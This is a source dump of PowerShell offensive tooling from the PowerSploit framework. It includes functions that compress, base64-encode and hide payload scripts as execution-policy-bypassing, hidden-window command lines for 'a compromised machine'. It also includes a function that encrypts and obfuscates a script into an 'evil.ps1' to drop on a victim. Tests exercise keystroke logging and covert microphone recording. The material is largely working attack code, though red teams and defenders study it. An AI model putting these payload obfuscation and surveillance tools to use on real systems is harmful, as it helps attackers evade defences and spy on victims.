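    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
    $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
    $DeflateStream.Dispose()
    $CompressedFileBytes = $CompressedStream.ToArray()
    $CompressedStream.Dispose()
    $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)

    Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"

    # $Length is baked into the loader so the inflate loop knows when the whole
    # image has been recovered. A single DeflateStream.Read may return fewer
    # bytes than requested, which would silently truncate larger assemblies
    # and make Assembly.Load fail with a BadImageFormatException; hence the loop.
    $Output = @"
`$EncodedCompressedFile = @'
$EncodedCompressedFile
'@
`$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
`$UncompressedFileBytes = New-Object Byte[]($Length)
`$BytesRead = 0
do {
    `$Chunk = `$DeflatedStream.Read(`$UncompressedFileBytes, `$BytesRead, $Length - `$BytesRead)
    `$BytesRead += `$Chunk
} while ((`$Chunk -gt 0) -and (`$BytesRead -lt $Length))
`$DeflatedStream.Dispose()
[Reflection.Assembly]::Load(`$UncompressedFileBytes)
"@

    Write-Output $Output
}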
82 |
--------------------------------------------------------------------------------
/ScriptModification/Out-EncodedCommand.ps1:
--------------------------------------------------------------------------------
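function Out-EncodedCommand
{
<#
.SYNOPSIS

Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

PowerSploit Function: Out-EncodedCommand
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.

The payload is Deflate-compressed and base64 encoded; the generated command line inflates it, decodes it as ASCII and passes it to Invoke-Expression. A UTF-8 byte order mark at the start of a payload file is stripped, since it would otherwise be decoded as '???' and break the script.

.PARAMETER ScriptBlock

Specifies a scriptblock containing your payload. The scriptblock text is encoded as ASCII, so non-ASCII characters are replaced with '?'.

.PARAMETER Path

Specifies the path to your payload.

.PARAMETER NoExit

Outputs the option to not exit after running startup commands.

.PARAMETER NoProfile

Outputs the option to not load the Windows PowerShell profile.

.PARAMETER NonInteractive

Outputs the option to not present an interactive prompt to the user.

.PARAMETER Wow64

Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. The path is built from $Env:windir of the machine generating the command line, not of the target.

.PARAMETER WindowStyle

Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.

.PARAMETER EncodedOutput

Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.

.EXAMPLE

C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}

powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

.EXAMPLE

C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput

powershell -NoP -NonI -W Hidden -E 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

Description
-----------
Execute the above payload for the lulz. >D

.OUTPUTS

System.String

The complete command line. A warning is written if it exceeds the cmd.exe length limit.

.NOTES

This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)

.LINK

http://www.exploit-monday.com
#>

    [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
        [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
        [ValidateNotNullOrEmpty()]
        [ScriptBlock]
        $ScriptBlock,

        [Parameter(Position = 0, ParameterSetName = 'FilePath' )]
        [ValidateNotNullOrEmpty()]
        [String]
        $Path,

        [Switch]
        $NoExit,

        [Switch]
        $NoProfile,

        [Switch]
        $NonInteractive,

        [Switch]
        $Wow64,

        [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
        [String]
        $WindowStyle,

        [Switch]
        $EncodedOutput
    )

    if ($PSBoundParameters['Path'])
    {
        Get-ChildItem $Path -ErrorAction Stop | Out-Null
        $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))

        # Drop a UTF-8 byte order mark. The generated loader decodes the payload
        # as ASCII, so the three BOM bytes would become '???' at the start of the
        # text handed to Invoke-Expression and the script would not run.
        if (($ScriptBytes.Length -ge 3) -and ($ScriptBytes[0] -eq 0xEF) -and ($ScriptBytes[1] -eq 0xBB) -and ($ScriptBytes[2] -eq 0xBF))
        {
            $Trimmed = New-Object Byte[]($ScriptBytes.Length - 3)
            [Array]::Copy($ScriptBytes, 3, $Trimmed, 0, $Trimmed.Length)
            $ScriptBytes = $Trimmed
        }
    }
    else
    {
        # ASCII is lossy: any non-ASCII character in the scriptblock becomes '?'
        # because the loader below reads the payload back as ASCII.
        $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
    }

    $CompressedStream = New-Object IO.MemoryStream
    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
    $DeflateStream.Dispose()
    $CompressedScriptBytes = $CompressedStream.ToArray()
    $CompressedStream.Dispose()
    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)

    # Generate the code that will decompress and execute the payload.
    # This code is intentionally ugly to save space.
    $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'

    # Base-64 strings passed to -EncodedCommand must be unicode encoded.
    $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
    $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))

    # Build the command line options
    # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
    $CommandlineOptions = New-Object String[](0)
    if ($PSBoundParameters['NoExit'])
    { $CommandlineOptions += '-NoE' }
    if ($PSBoundParameters['NoProfile'])
    { $CommandlineOptions += '-NoP' }
    if ($PSBoundParameters['NonInteractive'])
    { $CommandlineOptions += '-NonI' }
    if ($PSBoundParameters['WindowStyle'])
    { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }

    $CmdMaxLength = 8190

    if ($PSBoundParameters['Wow64'])
    {
        # NOTE: $Env:windir is expanded on the machine generating this command
        # line, not on the target where it is pasted.
        $PowerShellExe = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    }
    else
    {
        $PowerShellExe = 'powershell'
    }

    $Options = $CommandlineOptions -join ' '
    $PartiallyEncoded = "$PowerShellExe $Options -C `"$NewScript`""
    $FullyEncoded = "$PowerShellExe $Options -E `"$EncodedPayloadScript`""

    # Default to the fully base-64 encoded command. If that exceeds the cmd.exe
    # character limit, fall back to the partially encoded -C form to save space
    # (thanks @Carlos_Perez for the idea) - unless -EncodedOutput was requested,
    # in which case the fully encoded form is returned regardless of its length.
    if ($PSBoundParameters['EncodedOutput'] -or (($PartiallyEncoded.Length -le $CmdMaxLength) -and ($FullyEncoded.Length -le $CmdMaxLength)))
    {
        $CommandLineOutput = $FullyEncoded
    }
    else
    {
        $CommandLineOutput = $PartiallyEncoded
    }

    if ($CommandLineOutput.Length -gt $CmdMaxLength)
    {
        Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
    }

    Write-Output $CommandLineOutput
}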
185 |
--------------------------------------------------------------------------------
/ScriptModification/Out-EncryptedScript.ps1:
--------------------------------------------------------------------------------
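function Out-EncryptedScript
{
<#
.SYNOPSIS

Encrypts text files/scripts.

PowerSploit Function: Out-EncryptedScript
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-EncryptedScript will encrypt a script (or any text file for that
matter) and output the results to a minimally obfuscated script -
evil.ps1 by default. The generated script consists only of a
decryption function 'de' and the base64-encoded ciphertext.

The key is derived from the password and salt with PBKDF2
(Rfc2898DeriveBytes, HMAC-SHA1, 10000 iterations) and the file is
encrypted with AES-256 in CBC mode (PKCS7 padding) under the supplied
initialization vector.

.PARAMETER ScriptPath

Path to the script (or any other text file) to encrypt.

.PARAMETER Password

Password to encrypt/decrypt the script. This is the only secret: the
IV is stored in the generated script and the salt is supplied in the
clear at decrypt time, so a weak password can be brute-forced offline
by anyone holding evil.ps1.

.PARAMETER Salt

Salt value for encryption/decryption. This can be any string value; it
is hashed with SHA-256 before use, which also satisfies the minimum
salt length PBKDF2 requires. The salt is not stored in the output file
and must be passed to 'de' together with the password.

.PARAMETER InitializationVector

Specifies the 16-character initialization vector to be used (AES has
a 16-byte block). This is randomly generated by default and is stored
in the generated script, so it does not need to be secret.

.PARAMETER FilePath

Path of the generated script. Defaults to '.\evil.ps1'.

.EXAMPLE

C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty

Description
-----------
Encrypt the contents of this file with a password and salt. Without
the correct password and salt combination the ciphertext cannot be
read; the protection is only as strong as the password. This command
will generate evil.ps1 that can dropped onto the victim machine. It
only consists of a decryption function 'de' and the base64-encoded
ciphertext.

.EXAMPLE

C:\PS> [String] $cmd = Get-Content .\evil.ps1
C:\PS> Invoke-Expression $cmd
C:\PS> $decrypted = de password salt
C:\PS> Invoke-Expression $decrypted

Description
-----------
This series of instructions assumes you've already encrypted a script
and named it evil.ps1. The contents are then decrypted and the
unencrypted script is called via Invoke-Expression

.NOTES

This command can be used to encrypt any text-based file/script. A
UTF-8 byte order mark at the start of the file is dropped by 'de'
after decryption so the result can be passed straight to
Invoke-Expression. A wrong password or salt normally surfaces as a
padding exception from 'de'.
#>

    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptPath,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Password,

        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $Salt,

        [Parameter(Position = 3)]
        [ValidateLength(16, 16)]
        [String]
        $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),

        [Parameter(Position = 4)]
        [String]
        $FilePath = '.\evil.ps1'
    )

    # PBKDF2 iteration count. It is embedded in the generated decrypt function
    # so both sides always agree.
    $Iterations = 10000

    $AsciiEncoder = New-Object System.Text.ASCIIEncoding
    $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)
    # The IV is embedded in the generated script as base64 rather than as a
    # quoted string, so a caller-supplied IV containing quotes, '$' or
    # backticks cannot break the generated code.
    $ivBase64 = [Convert]::ToBase64String($ivBytes)

    # While this can be used to encrypt any file, it's primarily designed to encrypt itself.
    [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath
    if ($scriptBytes -eq $null)
    {
        # Empty input file: encrypt an empty payload rather than failing on .Length.
        $scriptBytes = New-Object Byte[](0)
    }

    # Rfc2898DeriveBytes rejects salts shorter than 8 bytes; hashing the user's
    # string keeps "any string value" valid as a salt.
    $SaltBytes = [System.Security.Cryptography.SHA256]::Create().ComputeHash($AsciiEncoder.GetBytes($Salt))
    $DerivedPass = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($Password, $SaltBytes, $Iterations)
    [Byte[]] $KeyBytes = $DerivedPass.GetBytes(32)

    $Aes = New-Object System.Security.Cryptography.RijndaelManaged
    $Aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $Aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $Encryptor = $Aes.CreateEncryptor($KeyBytes, $ivBytes)
    $MemStream = New-Object System.IO.MemoryStream
    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
    $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
    $CryptoStream.FlushFinalBlock()
    $CipherTextBytes = $MemStream.ToArray()
    $CryptoStream.Close()
    $MemStream.Close()
    $Aes.Clear()
    # Do not leave the derived key in this process longer than necessary.
    [Array]::Clear($KeyBytes, 0, $KeyBytes.Length)
    $Cipher = [Convert]::ToBase64String($CipherTextBytes)

    # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function.
    # The decrypt function reads the CryptoStream in a loop until it is drained; PKCS7 padding is removed by the stream itself,
    # so the recovered bytes are exactly the original file.
    $Output = @"
function de([String] `$b, [String] `$c)
{
    `$a = "$Cipher";
    `$encoding = New-Object System.Text.ASCIIEncoding;
    `$dd = [Convert]::FromBase64String("$ivBase64");
    `$aa = [Convert]::FromBase64String(`$a);
    `$s = [System.Security.Cryptography.SHA256]::Create().ComputeHash(`$encoding.GetBytes(`$c));
    `$derivedPass = New-Object System.Security.Cryptography.Rfc2898DeriveBytes(`$b, `$s, $Iterations);
    [Byte[]] `$e = `$derivedPass.GetBytes(32);
    `$f = New-Object System.Security.Cryptography.RijndaelManaged;
    `$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
    `$f.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
    `$g = `$f.CreateDecryptor(`$e, `$dd);
    `$i = New-Object System.IO.MemoryStream(`$aa, `$False);
    `$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);
    `$k = New-Object System.IO.MemoryStream;
    `$l = New-Object Byte[](4096);
    do { `$r = `$j.Read(`$l, 0, `$l.Length); if (`$r -gt 0) { `$k.Write(`$l, 0, `$r); } } while (`$r -gt 0);
    `$j.Close();
    `$i.Close();
    `$f.Clear();
    [Byte[]] `$h = `$k.ToArray();
    `$k.Close();
    if ((`$h.Length -gt 3) -and (`$h[0] -eq 0xEF) -and (`$h[1] -eq 0xBB) -and (`$h[2] -eq 0xBF)) { `$h = `$h[3..(`$h.Length-1)]; }
    return `$encoding.GetString(`$h);
}
"@

    # Output decrypt function and ciphertext to evil.ps1
    Out-File -InputObject $Output -Encoding ASCII $FilePath

    Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
}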
139 |
--------------------------------------------------------------------------------
/ScriptModification/Remove-Comments.ps1:
--------------------------------------------------------------------------------
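function Remove-Comments
{
<#
.SYNOPSIS

Strips comments and extra whitespace from a script.

PowerSploit Function: Remove-Comments
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.

The script is tokenized with PSParser; comment tokens are dropped, runs of newlines collapse to one, and runs of whitespace between tokens on a line collapse to one space. Every other token - including multi-line strings and here-strings - is copied from the source verbatim, so their contents (embedded line breaks, literal escape sequences such as `r`n, comment-looking text) are never altered.

A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!

.PARAMETER ScriptBlock

Specifies a scriptblock containing your script.

.PARAMETER Path

Specifies the path to your script.

.EXAMPLE

C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1

.EXAMPLE

C:\PS> Remove-Comments -ScriptBlock {
### This is my awesome script. My documentation is beyond reproach!
Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
### End script awesomeness
}

Write-Host 'Hello, World!'

.EXAMPLE

C:\PS> Remove-Comments -Path Invoke-Shellcode.ps1 | Out-EncodedCommand

Description
-----------
Removes extraneous whitespace and comments from Invoke-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.

.INPUTS

System.String, System.Management.Automation.ScriptBlock

Accepts either a string containing the path to a script or a scriptblock.

.OUTPUTS

System.Management.Automation.ScriptBlock

Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.

.LINK

http://www.exploit-monday.com
http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/
#>

    [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (
        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]
        [ValidateNotNullOrEmpty()]
        [String]
        $Path,

        [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]
        [ValidateNotNullOrEmpty()]
        [ScriptBlock]
        $ScriptBlock
    )

    Set-StrictMode -Version 2

    if ($PSBoundParameters['Path'])
    {
        Get-ChildItem $Path -ErrorAction Stop | Out-Null
        $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))
        $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)
    }
    else
    {
        # Convert the scriptblock to a string so that token offsets can be applied to it
        $ScriptBlockString = $ScriptBlock.ToString()
    }

    # Tokenize the scriptblock and return all tokens except for comments.
    # Token Start/Length offsets index into $ScriptBlockString.
    $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }

    $StringBuilder = New-Object Text.StringBuilder

    # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.
    $CurrentColumn = 1
    $NewlineCount = 0
    foreach($CurrentToken in $Tokens)
    {
        if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))
        {
            $CurrentColumn = 1
            # Only insert a single newline. Sequential newlines are ignored in order to save space.
            if ($NewlineCount -eq 0)
            {
                $StringBuilder.AppendLine() | Out-Null
            }
            $NewlineCount++
        }
        else
        {
            $NewlineCount = 0

            # Insert a single space in between tokens on the same line. Extraneous whitespace is ignored.
            if(($CurrentColumn -ne 1) -and ($CurrentColumn -lt $CurrentToken.StartColumn))
            {
                $StringBuilder.Append(' ') | Out-Null
            }

            # Copy the token's source text verbatim. Multi-line string tokens are
            # appended whole so their embedded line breaks survive, and nothing
            # inside any token is ever split or rewritten.
            $StringBuilder.Append($ScriptBlockString.Substring($CurrentToken.Start, $CurrentToken.Length)) | Out-Null

            # Update our position in the column
            $CurrentColumn = $CurrentToken.EndColumn
        }
    }

    Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
}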
157 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'ScriptModification.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Script Preparation/Modification Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
29 | 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md'
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
# Dot-source every *.ps1 that sits next to this module file so that their functions
# are defined in the module scope; the manifest exports '*', so all of them become
# public. Because this is a glob rather than a fixed file list, any .ps1 dropped into
# the module directory is executed on Import-Module - keep the folder's ACLs tight.
Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1') | ForEach-Object { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Tests/Exfiltration.tests.ps1:
--------------------------------------------------------------------------------
Set-StrictMode -Version Latest

# Tests live in .\Tests; the module manifest is resolved relative to the repository root.
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1"

# The bracketed wildcard makes Remove-Module a no-op instead of an error when the
# module is not currently loaded; -Force then guarantees a fresh import.
Remove-Module [E]xfiltration
Import-Module $ModuleManifest -Force -ErrorAction Stop
9 |
Describe 'Get-Keystrokes' {

    # Start from a clean log so the assertions below only see this run's output.
    if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" }
    $WindowTitle = (Get-Process -Id $PID).MainWindowTitle

    # Bring this console to the foreground so the synthesized keystrokes are delivered
    # to it and the logged WindowTitle matches the one captured above.
    $Shell = New-Object -ComObject wscript.shell
    $Shell.AppActivate($WindowTitle)

    $KeyLogger = Get-Keystrokes -PassThru
    Start-Sleep -Seconds 1

    # Type "Pester" then erase it with six backspaces so nothing is left in the console.
    $Shell.SendKeys("Pester`b`b`b`b`b`b")
    $KeyLogger.Dispose()

    It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true }

    $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv

    It 'Should log keystrokes' {
        # 14 is the size threshold the original test chose; presumably the CSV
        # header alone stays below it - confirm if the log format changes.
        $FileLength = (Get-Item "$($env:TEMP)\key.log").Length
        $FileLength | Should BeGreaterThan 14
    }

    It 'Should get foreground window title' {
        $KeyObjects[0].WindowTitle | Should Be $WindowTitle
    }

    It 'Should log time of key press' {
        $KeyTime = [DateTime]::Parse($KeyObjects[0].Time)
        $KeyTime.GetType().Name | Should Be 'DateTime'
    }

    It 'Should stop logging after timeout' {

        # Timeout is well under the 4 second sleep, so the runspace should be idle
        # ('Available') by the time it is inspected. This is timing dependent.
        $Timeout = 0.05
        $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru

        Start-Sleep -Seconds 4

        $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available'
        $KeyLogger.Dispose()
    }

    Remove-Item -Force "$($env:TEMP)\key.log"
}
55 |
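Describe "Get-MicrophoneAudio" {

    $RecordPath = "$env:TEMP\test_record.wav"
    # Recording length in seconds; used by both the success case and the
    # invalid-path case so that only the path differs between them.
    $RecordLen = 2
    Context 'Successful Recording' {
        BeforeEach {
            # Ensure the recording has been removed prior to testing
            Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
        }

        AfterEach {
            # Remove the recording after testing
            Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
        }

        It 'should record audio from the microphone and save it to a specified path' {
            $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen
            $result | Should Not BeNullOrEmpty
            $result.Length | Should BeGreaterThan 0
        }

    }

    Context 'Invalid Arguments' {
        It 'should not allow invalid paths to be used' {
            # Pass the real $RecordLen (the original passed the bare word RecordLen),
            # so the throw can only come from the bad path rather than from binding
            # a non-numeric -Length before path validation is ever reached.
            { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length $RecordLen } | Should Throw
        }
    }

}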
86 |
--------------------------------------------------------------------------------
/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
Set-StrictMode -Version Latest

# Tests live in .\Tests; the repository root, which the encoding check below walks, is its parent.
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 |
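filter Assert-NotLittleEndianUnicode {
<#
.SYNOPSIS

Throws if a script file carries a non-ASCII byte order mark.

.DESCRIPTION

Intended for a pipeline fed by Get-ChildItem: each item's FullName is bound to
-FilePath. Directories, missing files and files shorter than two bytes are skipped
silently. A file whose first two bytes are the UTF-16LE BOM (FF FE) or the start
of the UTF-8 BOM (EF BB) causes a terminating error that names the file. Both are
rejected because the suite asserts that every script is plain ASCII.

.PARAMETER FilePath

One or more paths to check. Accepts FileInfo objects from the pipeline via the
FullName alias.
#>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $True,
                   ValueFromPipelineByPropertyName = $True,
                   ValueFromPipeline = $True)]
        [Alias('FullName')]
        [String[]]
        $FilePath
    )

    # The first two bytes are compared as a little-endian UInt16, so the byte
    # sequence EF BB reads as 0xBBEF and FF FE reads as 0xFEFF.
    $Utf8Marker = 48111      # 0xBBEF: UTF-8 BOM (EF BB BF)
    $Utf16LEMarker = 65279   # 0xFEFF: UTF-16LE BOM (FF FE)

    foreach ($Path in $FilePath) {
        Write-Verbose "Current file: $Path"
        Write-Debug "Current file: $Path"

        if ([System.IO.Directory]::Exists($Path)) {
            Write-Debug "File is a directory."
            continue
        }

        if (-not [System.IO.File]::Exists($Path)) {
            Write-Debug "File does not exist."
            continue
        }

        # @() forces an array even when the file yields a single byte, so .Length
        # is valid under Set-StrictMode.
        $FileBytes = @(Get-Content -TotalCount 3 -Encoding Byte -Path $Path)

        # Two bytes are needed for the UInt16 comparison below.
        if ($FileBytes.Length -lt 2) {
            Write-Debug "File must be at least 2 bytes in length."
            continue
        }

        $Marker = [BitConverter]::ToUInt16([Byte[]]$FileBytes, 0)

        if ($Marker -eq $Utf16LEMarker) {
            Write-Debug "File contains little endian unicode marker."
            throw "$Path is little-endian unicode encoded."
        }

        if ($Marker -eq $Utf8Marker) {
            Write-Debug "File contains UTF-8 byte order mark."
            throw "$Path is UTF-8 encoded with a byte order mark."
        }
    }
}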
44 |
Describe 'ASCII encoding of all scripts' {
    # Every .ps1/.psd1/.psm1 under the repository root is piped through the filter
    # defined above. A throw for any one file fails this single assertion; the
    # thrown message identifies the offending item.
    It 'should not contain little-endian unicode encoded scripts or modules' {
        { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
    }
}
--------------------------------------------------------------------------------